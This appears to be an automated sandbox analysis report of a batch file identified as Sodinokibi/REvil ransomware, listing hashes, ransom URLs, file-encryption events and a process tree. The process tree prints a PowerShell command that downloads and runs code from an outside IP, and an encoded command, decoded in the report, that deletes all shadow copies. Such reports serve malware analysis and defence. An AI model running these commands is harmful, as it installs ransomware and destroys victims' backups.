Analysis
- max time kernel: 106s
- max time network: 106s
- platform: windows7_x64
- resource: win7v200217
- submitted: 25-02-2020 22:10
Static task: static1
Behavioral task: behavioral1
- Sample: E6ZiuRBj.bat
- Resource: win7v200217
Behavioral task: behavioral2
- Sample: E6ZiuRBj.bat
- Resource: win10v200217
General
- Target: E6ZiuRBj.bat
- Size: 192B
- MD5: 2249a41a0632a89a141033f45d9c71d8
- SHA1: d11ba758c8a87a62e773a95e5cd01787fdae226c
- SHA256: 03d85057c6e2669996196110f2b048f3de2e021f8806b61b6e4696ccc802e742
- SHA512: c59548a6636bf85403b1ea379760d5310e1d8aebc859227340d68de07eb3ec63672a31db38ef6cd519f58139c192a0e4a03adfbce34c42708b7c630c172a499a
Malware Config
Extracted
- http://185.103.242.78/pastes/E6ZiuRBj
Extracted
- C:\hp0ws8n-readme.txt
- sodinokibi
- http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/9180D364F1EFBA80
- http://decryptor.cc/9180D364F1EFBA80
Signatures
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
  Processes (pid | process):
    1860 | powershell.exe
- Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  Processes (description | ioc | process):
    Set value (str) | \REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\g31db2k04555.bmp" | powershell.exe
- Drops file in Program Files directory (33 IoCs)
  Processes (description | ioc | process):
    File renamed | C:\Program Files\ConvertToFormat.ini => \??\c:\program files\ConvertToFormat.ini.hp0ws8n | powershell.exe
    File opened for modification | \??\c:\program files\UnpublishConvertTo.rmi | powershell.exe
    File opened for modification | \??\c:\program files\SplitRestart.bmp | powershell.exe
    File renamed | C:\Program Files\SplitRestart.bmp => \??\c:\program files\SplitRestart.bmp.hp0ws8n | powershell.exe
    File opened for modification | \??\c:\program files\ConvertToFormat.ini | powershell.exe
    File renamed | C:\Program Files\EditRepair.mpv2 => \??\c:\program files\EditRepair.mpv2.hp0ws8n | powershell.exe
    File opened for modification | \??\c:\program files\RestartUninstall.midi | powershell.exe
    File renamed | C:\Program Files\SkipApprove.xhtml => \??\c:\program files\SkipApprove.xhtml.hp0ws8n | powershell.exe
    File created | \??\c:\program files\hp0ws8n-readme.txt | powershell.exe
    File opened for modification | \??\c:\program files\MoveWait.tif | powershell.exe
    File opened for modification | \??\c:\program files\SkipApprove.xhtml | powershell.exe
    File created | \??\c:\program files (x86)\hp0ws8n-readme.txt | powershell.exe
    File opened for modification | \??\c:\program files\EditRepair.mpv2 | powershell.exe
    File opened for modification | \??\c:\program files\ExpandProtect.ods | powershell.exe
    File renamed | C:\Program Files\ExpandProtect.ods => \??\c:\program files\ExpandProtect.ods.hp0ws8n | powershell.exe
    File opened for modification | \??\c:\program files\RestartSave.xltm | powershell.exe
    File renamed | C:\Program Files\UnpublishSync.aifc => \??\c:\program files\UnpublishSync.aifc.hp0ws8n | powershell.exe
    File renamed | C:\Program Files\DisableCopy.M2T => \??\c:\program files\DisableCopy.M2T.hp0ws8n | powershell.exe
    File renamed | C:\Program Files\GrantOpen.inf => \??\c:\program files\GrantOpen.inf.hp0ws8n | powershell.exe
    File renamed | C:\Program Files\RestartSave.xltm => \??\c:\program files\RestartSave.xltm.hp0ws8n | powershell.exe
    File opened for modification | \??\c:\program files\SuspendGrant.m4a | powershell.exe
    File created | \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\hp0ws8n-readme.txt | powershell.exe
    File opened for modification | \??\c:\program files\DisableCopy.M2T | powershell.exe
    File created | \??\c:\program files\microsoft sql server compact edition\hp0ws8n-readme.txt | powershell.exe
    File renamed | C:\Program Files\MoveWait.tif => \??\c:\program files\MoveWait.tif.hp0ws8n | powershell.exe
    File renamed | C:\Program Files\LockBackup.au => \??\c:\program files\LockBackup.au.hp0ws8n | powershell.exe
    File renamed | C:\Program Files\RestartUninstall.midi => \??\c:\program files\RestartUninstall.midi.hp0ws8n | powershell.exe
    File renamed | C:\Program Files\SuspendGrant.m4a => \??\c:\program files\SuspendGrant.m4a.hp0ws8n | powershell.exe
    File renamed | C:\Program Files\UnpublishConvertTo.rmi => \??\c:\program files\UnpublishConvertTo.rmi.hp0ws8n | powershell.exe
    File opened for modification | \??\c:\program files\GrantOpen.inf | powershell.exe
    File opened for modification | \??\c:\program files\LockBackup.au | powershell.exe
    File opened for modification | \??\c:\program files\UnpublishSync.aifc | powershell.exe
    File created | \??\c:\program files\microsoft sql server compact edition\v3.5\hp0ws8n-readme.txt | powershell.exe
- Suspicious use of WriteProcessMemory (5 IoCs)
  Processes (description | pid | process | target process):
    PID 1836 wrote to memory of 1860 | 1836 | cmd.exe | powershell.exe
    PID 1860 wrote to memory of 1972 | 1860 | powershell.exe | powershell.exe
    PID 1860 wrote to memory of 1972 | 1860 | powershell.exe | powershell.exe
    PID 1860 wrote to memory of 1972 | 1860 | powershell.exe | powershell.exe
    PID 1860 wrote to memory of 1972 | 1860 | powershell.exe | powershell.exe
- Suspicious use of AdjustPrivilegeToken (6 IoCs)
  Processes (description | pid | process):
    Token: SeDebugPrivilege | 1860 | powershell.exe
    Token: SeDebugPrivilege | 1860 | powershell.exe
    Token: SeDebugPrivilege | 1972 | powershell.exe
    Token: SeBackupPrivilege | 1424 | vssvc.exe
    Token: SeRestorePrivilege | 1424 | vssvc.exe
    Token: SeAuditPrivilege | 1424 | vssvc.exe
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes (pid | process):
    1860 | powershell.exe
    1860 | powershell.exe
    1860 | powershell.exe
    1972 | powershell.exe
    1972 | powershell.exe
- Blacklisted process makes network request (1 IoCs)
  Processes (flow | pid | process):
    3 | 1860 | powershell.exe
- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Discovering connected drives (3 TTPs, 7 IoCs)
  Processes (description | ioc | process):
    File opened (read-only) | \??\A: | powershell.exe
    File opened (read-only) | \??\B: | powershell.exe
    File opened (read-only) | \??\E: | powershell.exe
    File opened (read-only) | \??\F: | powershell.exe
    File opened (read-only) | \??\C: | powershell.exe
    File opened (read-only) | \??\C: | cmd.exe
    File opened (read-only) | \??\C: | powershell.exe
- Modifies service (2 TTPs, 4 IoCs)
  Processes (description | ioc | process):
    Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
    Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
    Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
    Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
Processes
- C:\Windows\system32\cmd.exe (PID 1836, depth 1)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\E6ZiuRBj.bat"
  Signatures:
  - Suspicious use of WriteProcessMemory
  - Discovering connected drives
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1860, depth 2)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/E6ZiuRBj');Invoke-VBJTAAEQT;Start-Sleep -s 10000"
    Signatures:
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Discovering connected drives
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1972, depth 3)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is base64-encoded UTF-16LE; it decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();})
      Signatures:
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
      - Discovering connected drives
- C:\Windows\system32\vssvc.exe (PID 1424, depth 1)
  Command line: C:\Windows\system32\vssvc.exe
  Signatures:
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service